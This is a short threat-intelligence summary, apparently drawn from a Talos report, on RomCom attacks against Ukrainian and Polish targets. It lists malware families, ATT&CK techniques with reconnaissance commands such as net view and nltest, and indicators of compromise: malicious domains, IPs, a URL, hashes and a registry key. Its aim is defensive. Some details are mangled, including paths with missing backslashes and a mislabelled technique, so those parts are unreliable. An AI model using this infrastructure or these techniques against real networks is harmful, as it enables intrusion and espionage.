Cisco Talos reports a new wave of attacks by the Russian-speaking group UAT-5647 (RomCom) targeting Ukrainian government entities and Polish organizations with an updated RomCom variant named SingleCamper and additional malware families. The operation shows espionage-focused, long-term access and data exfiltration, including edge-device tunneling, reconnaissance, and potential ransomware deployment, with tooling that spans Go, C++, Rust, and Lua.
Keypoints
- UAT-5647 (RomCom) is targeting Ukrainian government entities and Polish organizations.
- The latest attacks deploy SingleCamper, loaded directly from the registry into memory, as part of the RomCom family.
- Four malware families are identified: RustClaw/RustyClaw, MeltingClaw, DustyHammock, and ShadyHammock.
- Edge-device tunneling and lateral movement are used to expand access within target networks.
- Tooling now supports multiple languages, including GoLang, C++, Rust, and Lua.
- The infection chain begins with spear-phishing delivering downloaders, followed by backdoors and post-compromise activity.
- Post-compromise activities emphasize reconnaissance and data exfiltration, with a dual path toward long-term espionage and possible ransomware deployment.
MITRE Techniques
- [T1572] Application Layer Protocol – Used PuTTY’s Plink tool for establishing remote tunnels. Quote: ‘download PuTTY’s Plink tool to establish remote tunnels.’
- [T1016] System Network Configuration Discovery – Repeated ping sweeps for network reconnaissance. Quote: ‘repeated ping sweeps they carried out to find adjoining systems.’
- [T1135] Network Share Discovery – Commands to list shares on specific IPs. Quote: ‘net view /all [][]192[.]168[.]XXX[.]XXX net view /all [][]192[.]168[.]XXX[.]XXX net view /all [][]192[.]168[.]XXX[.]XXX’
- [T1082] System Information Discovery – Gathered system information using various commands. Quote: ‘Gathered system information using various commands.’
- [T1482] Domain Trust Discovery – nltest used to discover domain trusts. Quote: ‘nltest to discover domain trusts.’
- [T1560] Archive Collected Data – Staged entire drives and specific folders for exfiltration. Quote: ‘Staged entire drives and specific folders for exfiltration.’
Indicators of Compromise
- [SHA256 Hash] – RustyClaw and related payloads. 12bf973b503296da400fd6f9e3a4c688f14d56ce82ffcfa9edddd7e4b6b93ba9, 260a6644ab63f392d090853ccd7c4d927aba3845ced473e13741152cdf274bbd
- [Domain] – dnsresolver.online, apisolving.com
- [URL] – hxxp://apisolving.com:443/DKgitTDJfiP
- [IP Address] – 213.139.205.23, 23.94.207.116
- [File Path] – C:UsersAppDataRoamingmicrosoftWindowsRecent, C:UsersDocumentsd.zip
- [Registry Key] – HKCUSOFTWAREClassesCLSID{2155fee3-2419-4373-b102-6843707eb41f}InprocServer32
- [IPFS CID] – /ipns/k51qzi5uqu5dgn9wgsaxb7cfvinmk27eusoufaxrp8qd1ri5kamf41bg7gpydm
- [File Path] – C:UsersAppDataRoamingmicrosoftWindowsRecent (duplicate context)
Read more: https://blog.talosintelligence.com/uat-5647-romcom/